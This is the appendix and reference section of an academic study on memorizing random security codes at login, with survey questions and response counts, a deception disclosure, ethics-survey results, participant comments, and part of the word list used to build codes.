[20] B ONNEAU , J. The science of guessing: analyzing an
anonymized corpus of 70 million passwords. In 2012 IEEE Sym-
posium on Security and Privacy (May 2012).
[21] B ONNEAU , J. Moore’s Law won’t kill passwords. Light Blue
Touchpaper, January 2013.[22] B ONNEAU , J., H ERLEY , C., VAN OORSCHOT , P. C., AND
STAJANO , F. The Quest to Replace Passwords: A Framework
for Comparative Evaluation of Web Authentication Schemes. In
2012 IEEE Symposium on Security and Privacy (May 2012).
[23] B ONNEAU , J., J UST, M., AND MATTHEWS , G. What’s in a
Name? Evaluating Statistical Attacks on Personal Knowledge
Questions. In FC ’10: Proceedings of the the 14thInternational
Conference on Financial Cryptography (January 2010).
[24] B ONNEAU , J., P REIBUSCH , S., AND ANDERSON , R. A birth-
day present every eleven wallets? The security of customer-
chosen banking PINs. In FC ’12: Proceedings of the the 16th
International Conference on Financial Cryptography (March
2012).
[25] B ONNEAU , J., AND SCHECHTER , S. Towards reliable storage
of 56-bit secrets in human memory (extended version). Tech.
rep., Microsoft Research.
[26] B ONNEAU , J., AND SHUTOVA , E. Linguistic properties of
multi-word passphrases. In USEC ’12: Workshop on Usable
Security (March 2012).
[27] B ONNEAU , J., AND XU, R. Of contrase  ̃nas, sysmawt, and
m`ımˇa: Character encoding issues for web passwords. In Web
2.0 Security & Privacy (May 2012).
[28] B OYEN , X. Halting password puzzles. In USENIX Security
Symposium (2007).
[29] B RAND , S. Department of Defense Password Management
Guideline.
[30] B RANTZ , T., AND FRANZ , A. The Google Web 1T 5-gram
corpus. Tech. Rep. LDC2006T13, Linguistic Data Consortium,
2006.
[31] B ROSTOFF , A. Improving password system effectiveness . PhD
thesis, University College London, 2004.
[32] B ROWN , D. R. Prompted User Retrieval of Secret Entropy:
The Passmaze Protocol. IACR Cryptology ePrint Archive 2005
(2005), 434.
[33] B UNNELL , J., P ODD , J., H ENDERSON , R., N APIER , R., AND
KENNEDY -MOFFAT , J. Cognitive, associative and conventional
passwords: Recall and guessing rates. Computers & Security
16, 7 (1997), 629–641.
[34] B UNTING , M. Proactive interference and item similarity in
working memory. Journal of Experimental Psychology: Learn-
ing, Memory, and Cognition 32 , 2 (2006), 183.
[35] B URR, W. E., D ODSON , D. F., AND POLK, W. T. Electronic
Authentication Guideline. NIST Special Publication 800-63
(2006).
[36] C AMERON , K. A., H AARMANN , H. J., G RAFMAN , J., AND
RUCHKIN , D. S. Long-term memory is the representational
basis for semantic verbal short-term memory. Psychophysiology
42, 6 (2005), 643–653.
[37] C APLE , C. The Effects of Spaced Practice and Spaced Review
on Recall and Retention Using Computer Assisted Instruction.
PhD thesis, North Carolina State University, 1996.
[38] C EPEDA , N. J., P ASHLER , H., V UL, E., W IXTED , J. T., AND
ROHRER , D. Distributed practice in verbal recall tasks: A re-
view and quantitative synthesis. Psychological Bulletin 132 , 3
(2006), 354.
[39] C HIASSON , S., F ORGET , A., B IDDLE , R., AND VAN
OORSCHOT , P. C. Influencing users towards better passwords:
persuasive cued click-points. In Proceedings of the 22nd British
HCI Group Annual Conference on People and Computers: Cul-
ture, Creativity, Interaction-Volume 1 (2008), British Computer
Society, pp. 121–130.
18
[40] C HIASSON , S., VAN OORSCHOT , P. C., AND BIDDLE , R.
Graphical password authentication using cued click points. In
Computer Security–ESORICS 2007 . Springer, 2007, pp. 359–
374.
[41] C LAIR , L. S., J OHANSEN , L., E NCK, W., P IRRETTI , M.,
TRAYNOR , P., M CDANIEL , P., AND JAEGER , T. Password
exhaustion: Predicting the end of password usefulness. In In-
formation Systems Security . Springer, 2006, pp. 37–55.
[42] C RAIK , F. I., AND LOCKHART , R. S. Levels of processing:
A framework for memory research. Journal of Verbal Learning
and Verbal Behavior 11 , 6 (1972), 671–684.
[43] D AVIS , D., M ONROSE , F., AND REITER , M. K. On User
Choice in Graphical Password Schemes. In USENIX Security
Symposium (2004), vol. 13, pp. 11–11.
[44] D HAMIJA , R., AND PERRIG , A. D  ́ej`a Vu: A User Study Us-
ing Images for Authentication. In Proceedings of the 9th Con-
ference on USENIX Security Symposium - Volume 9 (Berkeley,
CA, USA, 2000), SSYM’00, USENIX Association, pp. 4–4.
[45] D ICRESCENZO , G., L IPTON , R., AND WALFISH , S. Perfectly
secure password protocols in the bounded retrieval model. In
Theory of Cryptography . Springer, 2006, pp. 225–244.
[46] D UGGAN , G. B., J OHNSON , H., AND GRAWEMEYER , B. Ra-
tional security: Modelling everyday password use. International
Journal of Human-Computer Studies 70 , 6 (2012), 415–431.
[47] E BBINGHAUS , H.  ̈Uber das ged  ̈achtnis: untersuchungen zur
experimentellen psychologie . Duncker & Humblot, 1885.
[48] F AHL, S., H ARBACH , M., A CAR, Y., AND SMITH , M. On
the ecological validity of a password study. In Proceedings of
the Ninth Symposium on Usable Privacy and Security (2013),
ACM, p. 13.
[49] G ANESAN , R., D AVIES , C., AND ATLANTIC , B. A new attack
on random pronounceable password generators. In Proceedings
of the 17th{NIST}-{NCSC}National Computer Security Con-
ference (1994).
[50] G ASSER , M. A random word generator for pronounceable pass-
words. Tech. rep., DTIC Document, 1975.
[51] G REENE , R. L. Spacing effects in memory: Evidence for a two-
process account. Journal of Experimental Psychology: Learn-
ing, Memory, and Cognition 15 , 3 (1989), 371.
[52] H ERTZUM , M. Minimal-feedback hints for remembering pass-
words. Interactions 13 , 3 (2006), 38–40.
[53] J AKOBSSON , M., Y ANG , L., AND WETZEL , S. Quantifying
the security of preference-based authentication. In Proceed-
ings of the 4th ACM Workshop on Digital Identity Management
(2008), ACM, pp. 61–70.
[54] J ERMYN , I., M AYER , A., M ONROSE , F., R EITER , M. K., R U-
BIN, A. D., ET AL . The design and analysis of graphical pass-
words. In Proceedings of the 8th USENIX Security Symposium
(1999), vol. 8, Washington DC, pp. 1–1.
[55] J EYARAMAN , S., AND TOPKARA , U. Have the cake and eat it
too—Infusing usability into text-password based authentication
systems. In Computer Security Applications Conference, 21st
Annual (2005), IEEE.
[56] J OSEFSSON , S. The Base16, Base32, and Base64 Data Encod-
ings. RFC 4648 (Proposed Standard), Oct. 2006.
[57] J UELS , A., AND RIVEST , R. L. Honeywords: Making
Password-cracking Detectable. In Proceedings of the 2013 ACM
SIGSAC Conference on Computer & Communications Security
(New York, NY , USA, 2013), CCS ’13, ACM, pp. 145–160.
[58] K ARGER , P. A., R OGER , U., AND SCHELL , R. Multics se-
curity evaluation: Vulnerability analysis. In HQ Electronic
Systems Division: Hanscom AFB, MA. URL: http://csrc. nist.
gov/publications/history/karg74. pdf (1974), Citeseer.[59] K ARPICKE , J. D., AND ROEDIGER III, H. L. Expanding
retrieval practice promotes short-term retention, but equally
spaced retrieval enhances long-term retention. Journal of Ex-
perimental Psychology: Learning, Memory, and Cognition 33 ,
4 (2007), 704.
[60] K AUFMAN , C., P ERLMAN , R., AND SPECINER , M. Network
security: Private communication in a public world . Prentice
Hall Press, 2002.
[61] K EITH , M., S HAO, B., AND STEINBART , P. J. The usability
of passphrases for authentication: An empirical field study. In-
ternational Journal of Human-Computer Studies 65 , 1 (2007),
17–28.
[62] K ELLEY , P. G., K OMANDURI , S., M AZUREK , M. L., S HAY,
R., V IDAS , T., B AUER , L., C HRISTIN , N., C RANOR , L. F.,
AND LOPEZ , J. Guess again (and again and again): Mea-
suring password strength by simulating password-cracking al-
gorithms. In 2012 IEEE Symposium on Security and Privacy
(2012), IEEE, pp. 523–537.
[63] K ELSEY , J., S CHNEIER , B., H ALL, C., AND WAGNER , D. Se-
cure applications of low-entropy keys. In Information Security .
Springer, 1998, pp. 121–134.
[64] K ING, M. Rebus passwords. In Proceedings of the Seventh
Annual Computer Security Applications Conference, 1991 (Dec
1991), pp. 239–243.
[65] K ITTUR , A., C HI, E. H., AND SUH, B. Crowdsourcing User
Studies with Mechanical Turk. In Proceedings of the SIGCHI
Conference on Human Factors in Computing Systems (New
York, NY , USA, 2008), CHI ’08, ACM, pp. 453–456.
[66] K JELDSKOV , I. J., S KOV, M., AND STAGE , J. Remembering
Multiple Passwords by Way of Minimal-Feedback Hints: Repli-
cation and Further Analysis. In Proceedings of the Fourth Dan-
ish Human-Computer Interaction Research Symposium (2008).
[67] K OMANDURI , S., S HAY, R., K ELLEY , P. G., M AZUREK ,
M. L., B AUER , L., C HRISTIN , N., C RANOR , L. F., AND
EGELMAN , S. Of passwords and people: measuring the ef-
fect of password-composition policies. In Proceedings of the
SIGCHI Conference on Human Factors in Computing Systems
(2011), ACM, pp. 2595–2604.
[68] K URZBAN , S. A. Easily Remembered Passphrases: A Better
Approach. SIGSAC Rev. 3 , 2-4 (Sept. 1985), 10–21.
[69] L ANDAUER , T., AND BJORK , R. Optimum rehearsal patterns
and name learning. InM. M. Gruneberg, PE Morris, & RN Sykes
(Eds.), Practical aspects of memory (pp. 625-632), 1978.
[70] L ASTPASS. LastPass Security Notification.
http://blog.lastpass.com/2011/05/lastpass-security-
notification.html.
[71] L EONHARD , M. D., AND VENKATAKRISHNAN , V. A compar-
ative study of three random password generators. In IEEE EIT
(2007).
[72] L EWIS , J. E. D-Day as They Saw it . Carroll & Graf, 2004.
[73] L U, B., AND TWIDALE , M. B. Managing multiple passwords
and multiple logins: MiFA minimal-feedback hints for remote
authentication. In IFIP INTERACT 2003 Conference (2003),
pp. 821–824.
[74] M EUNIER , P. C. Sing-a-Password: Quality Random Password
Generation with Mnemonics. 1998.
[75] M ORRIS , R., AND THOMPSON , K. Password Security: A Case
History. Communications of the ACM 22 , 11 (1979), 594–597.
[76] M UNROE , R. Password Strength. https://www.xkcd.com/
936/ , 2012.
[77] P AIVIO , A. Mental imagery in associative learning and mem-
ory. Psychological Review 76 , 3 (1969), 241.
19
[78] P AVLIK , P. I., AND ANDERSON , J. R. Using a model to com-
pute the optimal schedule of practice. Journal of Experimental
Psychology: Applied 14 , 2 (2008), 101.
[79] P ERCIVAL , C. Stronger key derivation via sequential memory-
hard functions. 2009.
[80] P IMSLEUR , P. A memory schedule. Modern Language Journal
(1967), 73–75.
[81] P OLYBIUS .Histories . Perseus Project, Tufts University, 118
BCE. Accessed 2012.
[82] P OND , R., P ODD , J., B UNNELL , J., AND HENDERSON , R.
Word association computer passwords: The effect of formula-
tion techniques on recall and guessing rates. Computers & Se-
curity 19 , 7 (2000), 645–656.
[83] P ROCTOR , R. W., L IEN, M.-C., V U, K.-P. L., S CHULTZ ,
E. E., AND SALVENDY , G. Improving computer security for
authentication of users: Influence of proactive password restric-
tions. Behavior Research Methods, Instruments, & Computers
34, 2 (2002), 163–169.
[84] P ROVOS , N., AND MAZIERES , D. A Future-Adaptable Pass-
word Scheme. In USENIX Annual Technical Conference,
FREENIX Track (1999), pp. 81–91.
[85] R ABKIN , A. Personal knowledge questions for fallback authen-
tication: Security questions in the era of Facebook. In Pro-
ceedings of the 4th Symposium on Usable Privacy and Security
(2008), ACM, pp. 13–23.
[86] R OSS, J., I RANI , L., S ILBERMAN , M. S., Z ALDIVAR , A.,
AND TOMLINSON , B. Who Are the Crowdworkers?: Shift-
ing Demographics in Mechanical Turk. In CHI ’10 Extended
Abstracts on Human Factors in Computing Systems (New York,
NY , USA, 2010), CHI EA ’10, ACM, pp. 2863–2872.
[87] S ANCHEZ , D. J., G OBEL , E. W., AND REBER , P. J. Perform-
ing the unexplainable: Implicit task performance reveals indi-
vidually reliable sequence learning without explicit knowledge.
Psychonomic Bulletin & Review 17 , 6 (2010), 790–796.
[88] S CHECHTER , S., B RUSH , A. B., AND EGELMAN , S. It’s No
Secret. Measuring the Security and Reliability of Authentica-
tion via “Secret” Questions. In Security and Privacy, 2009 30th
IEEE Symposium on (2009), IEEE, pp. 375–390.
[89] S HAY, R., K ELLEY , P. G., K OMANDURI , S., M AZUREK ,
M. L., U R, B., V IDAS , T., B AUER , L., C HRISTIN , N., AND
CRANOR , L. F. Correct horse battery staple: Exploring the
usability of system-assigned passphrases. In Proceedings of
the Eighth Symposium on Usable Privacy and Security (2012),
ACM, p. 7.
[90] S LAMECKA , N. J., AND GRAF, P. The generation effect: Delin-
eation of a phenomenon. Journal of Experimental Psychology:
Human Learning and Memory 4 , 6 (1978), 592.
[91] S MITH , S. L. Authenticating users by word association. Com-
puters & Security 6 , 6 (1987), 464–470.
[92] S PENDER , J. Identifying computer users with authentication
devices (tokens). Computers & Security 6 , 5 (1987), 385–395.
[93] S TOBERT , E. A. Memorability of Assigned Random Graphical
Passwords. Master’s thesis, Carleton University, 2011.
[94] S TROOP , J. R. Studies of Interference in Serial Verbal Reac-
tions. Journal of Experimental Psychology 18 , 6 (Dec. 1935),
643–662.
[95] S TUBBLEFIELD , A., AND SIMON , D. Inkblot authentication.
Microsoft Research (2004).
[96] T AO, H., AND ADAMS , C. Pass-Go: A Proposal to Improve
the Usability of Graphical Passwords. IJ Network Security 7 , 2
(2008), 273–292.[97] T HEETHICAL RESEARCH PROJECT . Post-experiment sur-
vey for deception studies. https://www.ethicalresearch.
org/ .
[98] VAN OORSCHOT , P. C., AND THORPE , J. On predictive mod-
els and user-drawn graphical passwords. ACM Transactions on
Information and System Security (TISSEC) 10 , 4 (2008), 5.
[99] VAN OORSCHOT , P. C., AND THORPE , J. Exploiting pre-
dictability in click-based graphical passwords. Journal of Com-
puter Security 19 , 4 (2011), 669–702.
[100] V ERAS , R., C OLLINS , C., AND THORPE , J. On the semantic
patterns of passwords and their security impact. In Network and
Distributed System Security Symposium (NDSS’14) (2014).
[101] V U, K.-P. L., P ROCTOR , R. W., B HARGAV -SPANTZEL , A.,
TAI, B.-L. B., C OOK , J., AND EUGENE SCHULTZ , E. Improv-
ing password security and memorability to protect personal and
organizational information. International Journal of Human-
Computer Studies 65 , 8 (2007), 744–757.
[102] W ALDEN , D., AND VLECK , T. V., Eds. The Compatible Time
Sharing System (1961–1973) Fiftieth Anniversary Commemora-
tive Overview . Washington: IEEE Computer Society.
[103] W EINSHALL , D., AND KIRKPATRICK , S. Passwords You’ll
Never Forget, but Can’t Recall. In CHI ’04 Extended Abstracts
on Human Factors in Computing Systems (New York, NY , USA,
2004), CHI EA ’04, ACM, pp. 1399–1402.
[104] W IEDENBECK , S., W ATERS , J., B IRGET , J.-C., B RODSKIY ,
A., AND MEMON , N. PassPoints: Design and longitudinal eval-
uation of a graphical password system. International Journal of
Human-Computer Studies 63 , 1 (2005), 102–127.
[105] W IXTED , J. T. The psychology and neuroscience of forgetting.
Annual Psychology Review 55 (2004), 235–269.
[106] W OOD , H. M. The use of passwords for controlled access to
computer resources , vol. 500. US Department of Commerce,
National Bureau of Standards, 1977.
[107] W OZNIAK , P. SuperMemo 2004. TESL EJ 10 , 4 (2007).
[108] Y AN, J. J., B LACKWELL , A. F., A NDERSON , R. J., AND
GRANT , A. Password Memorability and Security: Empirical
Results. IEEE Security & privacy 2 , 5 (2004), 25–31.
[109] Z HANG , J., L UO, X., A KKALADEVI , S., AND ZIEGELMAYER ,
J. Improving multiple-password recall: an empirical study. Eu-
ropean Journal of Information Systems 18 , 2 (2009), 165–176.
[110] Z VIRAN , M., AND HAGA, W. User authentication by cognitive
passwords: an empirical assessment. In Proceedings of the 5th
Jerusalem Conference on Information Technology (Oct 1990),
pp. 137–144.
[111] Z VIRAN , M., AND HAGA, W. J. Passwords Security: An Ex-
ploratory Study. Tech. rep., Naval Postgraduate School, 1990.
[112] Z VIRAN , M., AND HAGA, W. J. Password security: an em-
pirical study. Journal of Management Information Systems 15
(1999), 161–186.
20
A Completion Survey
[We present the number of participants who responded
with each option in square brackets ]
Congratulations!
You have completed all of your required attention
tests.
All you need to do now is complete this final survey.
Is English your native language?
• Yes [163]
• No; [7]
• I don’t understand the question [0]
• Decline to answer [0]
What is your gender?
• Female [74]
• Male [96]
• Decline to answer; [0]
What is your age?
[Drop down list here with one option for ‘under 18’ and
numbers from 18 to 100]
[3×18, 4×19, 4×20, 5×21, 14×22, 6×23, 7×24,
6×25, 14×26, 10×27, 10×28, 12×29, 5×30, 6×31,
7×32, 7×33, 5×34, 6×35, 3×36, 4×37, 1×38,
3×39, 3×40, 4×41, 5×42, 1×43, 4×45, 1×48,
1×50, 2×53, 1×54, 1×55, 1×57, 1×58, 2×62,
1×65]
What is your current occupation?
• Administrative Support (eg., secretary, assistant)
[15]
• Art, Writing and Journalism (eg., author, reporter,
sculptor) [2]
• Business, Management and Financial (eg., manager,
accountant, banker) [15]
• Education (eg., teacher, professor) [14]
• Legal (eg., lawyer, law clerk) [3]
• Medical (eg., doctor, nurse, dentist) [6]
• Science, Engineering and IT professional (eg., re-
searcher, programmer, IT consultant) [28]
• Service (eg., retail clerks, server) [12]
• Skilled Labor (eg., electrician, plumber, carpenter)
[3]
• Student [25]
• Other Professional [8]
• Not Currently Working/Currently Unemployed [23]
• Retired [2]
• Other [11]
• Decline to answer
What is the highest level of education you have com-
pleted?• Did not complete high school [1]
• High school/GED [17]
• Some college [57]
• Associate’s degree [15]
• Bachelor’s degree [59]
• Master’s degree [13]
• Doctorate degree [2]
• Law degree [2]
• Medical degree [1]
• Trade or other technical school degree [3]
• Decline to answer [0]
The following questions are about how you logged
into the attention study using your username, password,
and security code. [We removed mention of the security
code for those in the control group.]
Was your password ever automatically filled in by your
browser or another password manager?
• Yes [1]
• No [169]
• I don’t know [0]
• I don’t understand this question [0]
Did you store your password for the study website,
such as by writing it down, emailing it to yourself, or
adding it to a password manager?
• Yes [24]
• No [146]
[If yes]
Please explain how and where you stored your password.
[Text field here]
[The following questions appeared only for those who
received a security code, not for the control group.]
Did you store any part of the additional security code for
the study website, such as by writing it down, emailing it
to yourself, or adding it to a password manager?
• Yes [28]
• No [107]
[If yes]
Please explain how and where you stored your security
code.
[Text field here]
Please type as much of your security code as you can
recall using only your memory. Do not include the pass-
word you chose—only include the security code we as-
signed you and which you learned during the study. It
is important that we understand how much of the code is
still in your memory, so if you stored or wrote down your
code down, please do not look at it before answering this
question. If you don’t remember any of it at all, type ’*’.
[Text field here]
21
Please explain any mental tricks (a.k.a. ‘heuristics’)
you may have used to learn your security code. If you
didn’t use any heuristics, just write ‘none’.
[Text field here]
[Once reaching this page, we prevented participants from
returning to earlier parts of the survey so that they could
not change their answers after the deception was re-
vealed.]
As you may have already suspected, one focus of this
research was the security code you were required to en-
ter when logging into the study website. One of the re-
search questions we are examining is whether computer
users can learn to memorize security codes that are long
and complex enough to protect data against the strongest
possible attacks.
One possible use of such a security code would be
to protect the passwords stored in a password man-
ager. A password manager is a program that stores your
passwords and automatically enters them when needed.
Many web browsers include password managers. Some
password managers allow you to store all your passwords
online, so that you can access them from different com-
puters.
Since password managers need to keep a list of your
passwords, it is very important to protect that list. Many
allow you to protect that list with a master password—
a single password that will grant access to all of your
other passwords. However, few passwords are strong
enough to protect a password list if attackers are able to
get a copy of it. Attackers can guess many seemingly-
good passwords by using computers to make billions of
guesses.
An alternative to using a password alone would be to
add a security code, like the one in this study, which
you would learn each time you logged into the password
manager. Once you were certain that you had memorized
your security code, you could stop using your password
and use the security code alone. To break a security code
like the one in this study would require attackers to make
quadrillions of guesses (millions of billions), which can
be made effectively impossible.
If you were using a password manager, would you use
a security code, which you would learn over time, like
the one in this study?
• Yes [71, 40 in letters and 31 in words ]
• Maybe [51, 24 in letters and 27 in words ]
• No [13, 5 in letters and 8 in words ]
Please explain your preference.
[Text field here]
If you could use either a security code from memory,
which you would learn as you did in this study, or copy
a code of the same length sent to you via a text message
each time you needed it, which would you choose?• The SMS (text) message code [21, 10 in letters and
11 in words ]
• Not sure [9, 6 in letters and 3 in words ]
• The memorized security code [105, 53 in letters and
52 in words ]
Please explain your preference.
[Text field here]
If you could use either a security code from memory,
which you would learn as you did in this study, or copy
a code of the same length from an application on your
mobile phone, which would you choose?
• The mobile phone app [18, 9 in letters and 9 in
words ]
• Not sure [9, 5 in letters and 4 in words ]
• The memorized security code [108, 55 in letters and
53 in words ]
Please explain your preference.
[Text field here]
If you could use either a security code from memory,
which you would learn as you did in this study, or in-
stead carry a USB key and attach it to whichever com-
puter you are using at the time you need it, which would
you choose?
• The USB key [16, 10 in letters and 6 in words ]
• Not sure [7, 3 in letters and 4 in words ]
• The memorized security code [112, 56 in letters and
56 in words ]
Please explain your preference.
[Text field here]
Before you started this final survey, did you suspect
that we were studying your ability to learn the security
code, or that the security code was was a focus of the
study?
• I did not suspect [36, 25 in letters and 11 in words ]
• I suspected it was [71, 28 in letters and 43 in words ]
• I was certain it was [28, 16 in letters and 12 in
words ]
If you encountered any problems during the study, or
any bugs in our study website, please let us know about
them.
[Text field here]
If our analysis raises more questions about your expe-
rience during the study, may we contacted you and ask
you to answer a few questions in return for an additional
bonus? If so, provide your email below. (This is op-
tional!)
[Text field here]
You have now completed the entire study. Thank you
so much for your time and attention. We will process
22
payment within the next two business days. If your pay-
ment does not arrive within that time, please contact us at
msrstudy@microsoft.com. Please make a record of that
email address just in case. (You can also find it at the
bottom of all the web pages on this site.)
As the experiment you just completed contained an el-
ement of deception, we would like to ask you to take a
short survey, operated by the Ethical Research Project, at
which you can learn about the deception in this experi-
ment. If you feel the use of deception in this experiment
was unacceptable, you will be given the opportunity to
withdraw your consent from the study, obligating us to
exclude your data from the experiment (without sacrific-
ing your payment).
You will not be required to answer any question you
are uncomfortable with. Once you have completed the
survey, you do not need to return to this website. You
have already done everything required to be paid for your
participation.
Please continue to the short Ethical Research Project
survey by clicking the link below:
[Link here]
This survey has been submitted. You may close this
tab at any time. If you click Finish, you will be taken to
the Ethics survey.
B Deception disclosure
We provided the following disclosure to display to par-
ticipants as part of the third-party post-deception survey
hosted by The Ethical Research Project[97].
Scientific objective
The purpose of this study was to test the hypothesis that
users can learn security code through repetition during
the process of logging into a computer or website. To test
this hypothesis, we assigned one group of participants a
security code composed of groups of four random letters
(e.g., ‘jdiw’), another group of participants a code com-
posed of groups of two random words (e.g., ‘baker first’),
and a third (control) group received no security code.
What was deceptive
We presented the attention task as the focus of the study,
but our primarily focus was the login page and the use of
a security code on that page.
Why deception was necessary
If we had informed you and other participants that the se-
curity code was the focus of the study, and that we were
measuring how well participants learn security codes,you or other participants may have behaved differently.
For example, some participants may have worked harder
to learn how to use the security code, or worked harder
to memorize the security code, than they would have had
they not known it was the focus of the study. In real-
world use, users who log into computers or websites are
focused on getting something done, and cannot be ex-
pected to put extra effort into learning a security code
beyond the time required to enter it. We believed it essen-
tial that participants be focused on the attention task so
as to simulate a real-world use case in which users would
tackle a mentally-taxing task immediately after provid-
ing their security code. We assigned some participants
to a control group so we could determine if the security
code was causing participants to drop out of the study at a
higher rate than they would if they had not been required
to enter a security code.
Actions we are taking to minimize potential harms
from deception
When describing the amount of time required for this
study, we made sure to make generous estimates for how
long it would take to log into the site. We budgeted a full
minute for you to enter your username, password, and
security code. Since most users can enter their username
and password in well under 15 seconds, that included at
least 15 seconds per security code. We are measuring
the time participants require to enter security codes to
make sure that this estimate has been fair. We are also
measuring and monitoring participant responses to make
sure that the deception is not causing any unanticipated
harms or objections.
C Invitation to follow-up study
We emailed participants with the following:
subject: Bonus HIT for Attention Study
Thanks for participating in the Microsoft Research
Attention Study.
We’ve added one more HIT that will allow you to earn $1
for answering just one question. To find it, search for a
HIT containing the word “TYFPITMAS”. The requester
will be “Research Project.
This HIT is only open to participants who completed the
attention study. If you know anyone else participating
in the study, please do not tell them about this HIT. It
is important that they receive their invitation at the time
specified by our study protocol.
Thanks again
Stuart Schechter
Microsoft Research
23
D Ethics response
A full 164 of 170 participants who completed the ‘at-
tention’ study also completed at least some of the
third-party-hosted post-deception ethics questionnaire.
The questionnaire includes a section written by the re-
searchers behind a study (us) that explains the nature of
the deception and a scientific justification for it, which
you can find in Appendix B.
When the ethics survey asked participants if our study,
and others like it, should be allowed to proceed, three
preferred not to answer, one responded definitely not’,
two responded ‘probably not’, seven responded ‘prob-
ably’, and 147 responded that it should ‘definitely’ be
allowed to proceed. There’s reason to believe the partici-
pant who selected the ‘definitely not’ option may have in-
tended to choose the opposite response, as (s)he provided
the following explanation for the choice: “Although there
was an unexpected element to the survey, it did no phys-
ical or mental harm.” Those who chose the option ‘prob-
ably not’ option wrote “Sounds like a lot of work for
nothing” and “Not a huge breach of trust... It was fairly
obvious there were no major security breaches. It was
clear what the purpose of the characters was.”
The ethics survey randomly selected 82 participants to
ask whether they would be concerned for a friend if the
friend had been invited to the study and was considering
participating. Two reported responded being ‘somewhat
concerned’ and the 76 others responded that they were
not concerned.
For those participants not asked to gauge a level of
concern about a friend participating, the ethics survey
instead asked the hypothetical: “If someone I cared
about was considering participating in this experiment,
I would. . . ” Two participants preferred not to answer,
none reported that they would ‘strongly discourage them
from participating’, and one chose ‘gently discourage
them from participating’. Eight would ‘neither discour-
age nor encourage their participation’, 18 would ‘gently
encourage them to participate’ and 53 would ‘strongly
encourage them to participate.’
E Participants who didn’t complete the
learning process
One participant in the letters treatment never entered the
first code three consecutive times before the hint ap-
peared, and did not receive a second or third chunk of
four letters. Another four participants failed to do so for
their second chunk of four letters, and one participant in
thewords treatment failed to do so for her second two
words. We offered them $1 to explain why, increasing
to $2 for particularly insightful explanations. We paidall participants who responded $2. Below are their re-
sponses.
———————————
Hi;
There may have been a number of reasons as to
why that people would do that but in my case there
was only one. There was a complete disincentive to
do so. When I first began the experiment I created a
password and was mildly annoyed by the creation of
the (first) additional security code. The rationale given
for doing this seemed thin at best. So imagine my
disappointment when I was rewarded for memorizing
the first code by having another one added. I envisioned
having code after code added to the end until infinity
but I discovered that if I refused to play the game at all
then the length of the code never grew more. Remember
I was still thinking that the reflex test was the point of
the experiment and that the passwords were a slight side
show of an annoyance.
Well, that’s my explanation. Hope this helps.
———————————
That’s an easy enough question. I didn’t try to en-
ter the second pair of words because it was kind of clear
after learning the first pair that this would just result in a
third pair and a fourth pair and ...
I see a lot of odd games in these surveys and if I can
avoid memorizing long strings of gibberish, at least for
as long as possible, I will try. I have to admit that I was
kind of pleased that it worked and I wasn’t forced to
learn more and more ... Hooray!
———————————
Hi, no problem! I thought it was just going to
keep adding a new code every few rounds, for the whole
90 rounds. I didn’t want a ridiculously long code to type
in, as I already felt it was pretty long with my chosen
password and the additional two 4-letter codes. I’d
rather wait a few seconds and have a shorter code. If I’d
known there would only be a maximum of three 4-letter
codes to type in over the course of the experiment, I
would have typed them in immediately as I learned them.
———————————
Your system should have recorded that I NEVER
NOT ONCE typed it in at all before the “hint” ap-
peared. I doubt my dog would feel like memorizing
password just to be given more passwords to memo-
24
rize. I mean are you serious? If there are people that
fell for that please do not tell me as I would be very
disappointed and fearful for the future of humanity. lol ...
———————————
I was only able to commit the first code and part
of the second to memory. I would have to wait for it
to load the code for the second one every time. I just
couldn’t remember that one for some reason, it was like
it had a weird string of letters that were hard for me to
remember easily. I hope this helped explain it.
———————————
Yeah, I did believed I knew that, I could the type
the code before seeing it. There were times in which
I started typing the code before the hint would appear,
and there were times, I forgot the password, and I would
wait for it to load. I hope this answer the question
you wanted, if not, I can expand more on my answer.
Also, thank you for the $2 bonus. That was extremely
generous on your part. I would have done it for free,
since the pay and your prompt responses was more than
I had anticipated.
———————————
25
Figure 8: Offer.
26
Figure 9: The sign-up page for our full study.
27
able abuse acid acorn acre actor add adobe adult aft age agile agony
air alarm album alert alive ally amber ample angle anvil apply apron arbor
area army aroma arrow arson ask aspen asset atlas atom attic audit aunt
aura auto aware awful axis baby back bad baker bare basis baton beam
beer begin belly bench best bias big birth bison bite blame blind bloom
blue board body bogus bolt bones book born bound bowl box brain break
brief broth brute buddy buff bugle build bulk burst butt buy buzz cabin
cadet call camp can cargo case cedar cello cent chair check child chose
chute cider cigar city civil class clear climb clock club coal cobra code
cog color comic copy cord cost court cover craft crew crime crown cruel
cups curve cut cycle daily dance dark dash data death debt decoy delay
depot desk diary diet dim ditto dizzy dose doubt downy dozen drawn dream
drive drop drug dry due dust duty dwarf eager early easy eaten ebb
echo edge edit egg elbow elder elite elm empty end enemy entry envy
equal era error essay ether event exact exile extra eye fact faith false
fancy far fatal fault favor feast feet fence ferry fetch feud fever fiber
field fifty film find first fit flat flesh flint flow fluid fly focus
foe folk foot form four foyer frame free front fruit full fume funny
fused fuzzy gala gang gas gauge gaze gel ghost giant gift give glad
gleam glory glut goat good gorge gourd grace great grid group grub guard
guess guide gulf gym habit half hand happy harsh hasty haul haven hawk
hazy head heel help hem here high hike hint hoax holy home honor
hoop hot house huge human hurt husk hyper ice idea idle idol ill
image inch index inner input iris iron issue item ivory ivy jade jazz
jewel job join joke jolly judge juice junk jury karma keep key kid
king kiss knee knife known labor lady laid lamb lane lapse large last
laugh lava law layer leaf left legal lemon lens level lies life lily
limit link lion lip liter loan lobby local lodge logic long loose loss
loud love lowly luck lunch lynx lyric madam magic main major mango maple
march mason may meat media melon memo menu mercy mess metal milk minor
mixed model moist mole mom money moral motor mouth moved mud music mute
myth nap navy neck need neon new nine noble nod noise nomad north
note noun novel numb nurse nylon oak oats ocean offer oil old one
open optic orbit order organ ounce outer oval owner pale panic paper part
pass path pause pawn pearl pedal peg penny peril petty phase phone piano
piece pipe pitch pivot place plea plot plug poet point polo pond poor
poppy porch posse power press price proof pub pulse pump pupil pure quart
queen quite radio ram range rapid rate razor real rebel red reef relic
rents reply resin rhyme rib rich ridge right riot rise river road robot
rock roll room rope rough row royal ruby rule rumor run rural rush
saga salt same satin sauce scale scene scope scrap sedan sense serve set
seven sewer share she ship show shrub sick side siege sign silly siren
six skew skin skull sky slack sleep slice sloth slump small smear smile
snake sneer snout snug soap soda solid sonic soon sort soul space speak
spine split spoke spur squad state step stiff story straw study style sugar
suit sum super surf sway sweet swift sword syrup taboo tail take talk
taste tax teak tempo ten term text thank theft thing thorn three thumb
tiara tidal tiger tilt time title toast today token tomb tons tooth top
torso total touch town trade trend trial trout true tube tuft tug tulip
tuna turn tutor twist two type ultra uncle union upper urban urge user
usual value vapor vat vein verse veto video view vigor vinyl viper virus
